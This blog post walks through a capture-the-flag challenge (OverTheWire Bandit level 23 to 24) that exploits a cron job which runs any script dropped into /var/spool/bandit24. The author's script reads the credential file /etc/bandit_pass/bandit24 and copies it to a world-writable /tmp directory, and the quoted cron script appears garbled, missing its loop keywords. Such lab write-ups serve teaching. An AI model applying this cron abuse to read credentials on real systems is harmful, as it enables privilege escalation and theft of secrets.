Exploiting Cron-Jobs

Exploiting Cron-Jobs

In this post, I would like to run through another one of OverTheWire's hacking challenges. To preserve the integrity of the challenges, all passwords in this post have been falsified.

Another day, another server. We have very limited access on our current user bandit23, and are tasked with gaining access to user bandit24.

One directory we can access, however, is /etc/cron.d. Unlike /var/spool/cron, files stored in /etc/cron.d are effectively root-owned scripts.

There does indeed happen to be an active crontab file in this directory:

bandit23@bandit:~$ cd /etc/cron.d
bandit23@bandit:/etc/cron.d$ ls

And taking a look into this script we can see that this crontab is executing a bash script held in another directory:

bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

This bash script is executed by the root-owned cronjob every minute, as denoted by the cron scheduler.

Let's take a look at this bash script:

bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh


cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
    if [ "$i" != "." -a "$i" != ".." ];
        echo "Handling $i"
        timeout -s 9 60 ./$i
        rm -f ./$i

Now what this script appears to be doing is entering a defined directory, executing all scripts within that directory, and then deleting them. This works nicely for us!

If this cronjob executes a bash script, and that bash script executes other bash scripts...well then I just need to write a bash script.

I'll start with making my own directory where I have ownership:

bandit23@bandit:~$ mkdir /tmp/skyenet
bandit23@bandit:~$ chmod 777 /tmp/skyenet

We were shown earlier in the series that there is a directory /etc/bandit_pass/ where user passwords are stored, with the file permissions restricted to each relevant user. If bandit24 will be executing this bash script, then we can have them fetch their own password and share it with us.

And so that's what I will do!

Creating our script as so will print the content's of bandit24's password file, and output to a new .txt file within our own directory:

bandit23@bandit:~$ touch /tmp/skyenet/script.sh
bandit23@bandit:~$ cat /tmp/skyenet/script.sh
cat /etc/bandit_pass/bandit24 > tmp/skyenet/password.txt

Now we can make our script executable, and deviously place this in bandit24's /var/spool/ directory:

bandit23@bandit:~$ chmod +x /tmp/skyenet/script.sh
bandit23@bandit:~$ cp /tmp/skyenet/script.sh /var/spool/bandit24/

As soon as the cronjob next runs, our script will be executed and a .txt will hopefully appear in our directory:

bandit23@bandit:~$ cd /tmp/skyenet/
bandit23@bandit:/tmp/skyenet$ ls

Not yet...

bandit23@bandit:/tmp/skyenet$ ls

Nearly there...

bandit23@bandit:~$ cd /tmp/skyenet/
bandit23@bandit:/tmp/skyenet$ ls
script.sh  password.txt
bandit23@bandit:/tmp/skyenet$ cat password.txt

Success! We have our password, and can proceed to SSH into user bandit24.

This has been a quick look into exploiting cronjobs and user permissions.

Thank you for reading!

DISCLAIMER: Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors of SkyeNet.tech will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

Related Article